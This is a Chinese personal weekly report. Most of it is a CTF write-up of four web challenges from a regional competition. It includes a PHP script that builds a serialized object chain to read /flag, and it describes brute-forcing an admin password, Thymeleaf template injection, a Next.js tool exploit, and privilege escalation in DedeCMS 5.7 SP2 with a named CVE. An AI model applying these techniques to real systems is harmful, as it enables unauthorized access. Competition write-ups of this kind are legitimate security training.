完成事项

  • 刷题
  • 活着

未完成的事项

  • 暂时没有

下周待做的事

  • 学学学
  • 摸鱼
  • 上班

本周知识分享

hellogate

拿到环境ctrl+U得到源码

一道很简单的反序列化题目

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
error_reporting(0);
class A {
public $handle;
}
class B {
public $worker;
public $cmd;
}
class C {
public $cmd;
}

$c = new C();
$c->cmd = "/flag";
$b = new B();
$b->worker = $c;
$b->cmd = "anything";

$a = new A();
$a->handle = $b;

echo serialize($a);
?>

然后data请求就得到flag了

EzJava

爆破后台密码为admin123

进入后测试发现为Thymeleaf ssti

得到所有目录

然后读文件的时候burp回显不出来,去前端读就出了

redjs

next.js,3000端口,直接工具一把梭

出了

dedecms

一眼织梦cms5.7 sp2 ,这个版本的洞都是基于dede后台进行展开的,创建账号之后,查看到有如下用户

好吧,我承认接下来有猜的成分,去dede后台发现Aa123456789/Aa123456789这个账号也是一个管理员账号

但是不是超级管理员,那么直接提权

这下功能点正常了

直接套nday打,最后CVE-2025-6335这个打通了

有点限制用readfile和glob协议读出flag

结语

咕咕嘎嘎!去年我记得不是这样的,去年web出一题就线下了,今年的华东赛区怎么回事,无语了,坐了8小时牢,纯纯熬老登
,还冒出来不少天才少年